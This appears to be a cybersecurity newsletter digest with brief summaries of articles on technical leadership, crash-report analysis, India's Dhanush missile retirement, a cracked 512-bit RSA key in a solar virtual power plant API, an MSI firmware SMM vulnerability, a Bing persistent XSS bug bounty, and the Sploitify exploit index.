• On Leadership & Staying Technical - The author discusses the importance of maintaining technical skills while transitioning into leadership roles, emphasizing the benefits of staying technical for career flexibility and credibility. They outline a continuous journey of technical skill development, emphasizing the importance of hands-on experience, teaching others, and time management for skill building. The author also shares tips for overcoming mental resistance to learning and highlights the value of incremental skill development over time. Additionally, they offer advice on finding joy in the learning process and staying committed to skill development.

• Hacking as a pathway to building better Products - Hacking can lead to the development of better products, as hackers challenge accepted truths and bring a different perspective to product design.

• The Hidden Treasures of Crash Reports - In this blog post, Patrick Wardle discusses the importance of analyzing crash reports to reveal malware, bugs, and other valuable information. He highlights the significance of crash reports for defense and offense in cybersecurity, and provides examples of real-life crashes that exposed vulnerabilities in software. Crash reports are shown to be critical for developers, threat hunters, and malware analysts in identifying and fixing issues. The post also delves into specific examples of crashes and bugs found in macOS and iOS systems, emphasizing the usefulness of crash reports in uncovering critical security flaws.

• Hot-Launch Yoga: Cobra Pose Reveals Nuke Repose - The Indian Navy has integrated yoga into its training and cultural practices for years, and recent social media posts and satellite imagery suggest that India may have retired its nuclear-capable Dhanush missiles from its naval forces. This retirement is likely due to the development of India's sea-based nuclear deterrent, with new ballistic missile submarines expected to be commissioned soon. The retirement of the Dhanush missiles has been confirmed through unique social media images, indicating a shift in India's nuclear arsenal.

• Hacking a Virtual Power Plant - Ryan Castellucci recently shared his experience of hacking into a Virtual Power Plant through the API of his solar panels and battery storage system. He discovered security vulnerabilities in the system's 512-bit RSA key and was able to crack it using mathematical calculations. Castellucci responsibly disclosed the issue to the vendor and received a prompt response, with the company quickly fixing the problem by upgrading to a 4096-bit RSA key. He emphasizes the importance of task-oriented cryptography libraries to prevent non-experts from making security decisions and is advocating for dropping support for 512-bit RSA keys in major cryptography libraries.

• At Home In Your Firmware: Analysis of CVE-2024-36877 - The article explores a vulnerability in MSI firmware, specifically a buffer overflow in the SMM driver that allows attackers to execute arbitrary code. The process involves leveraging System Management Mode (SMM) to gain access to SMRAM, allowing for code execution in the firmware. The author provides a detailed analysis of the vulnerability and the steps taken to exploit it, including writing a stub loader to facilitate data copying in and out of SMRAM. The writeup showcases the complexities of SMM exploitation and firmware persistence, ending with an invitation for further collaboration or opportunities.

• Persistent XSS on Microsoft Bing.com by poisoning Bingbot indexing - The author discovered a persistent XSS vulnerability on Microsoft Bing's video indexing system by injecting malicious scripts into video metadata indexed by Bingbot. This vulnerability could lead to various attacks, such as cookie theft, session hijacking, and phishing, affecting all users who view the infected content. The author reported the vulnerability to Microsoft through their security program, received a $3000 bounty, and published a blog post detailing the issue and the steps taken to address it.

• Sploitify - This project is an interactive cheat sheet containing a curated list of public server-side exploits. Its goal is to help find exploits for offensive security purposes, such as bug bounty programs or penetration testing.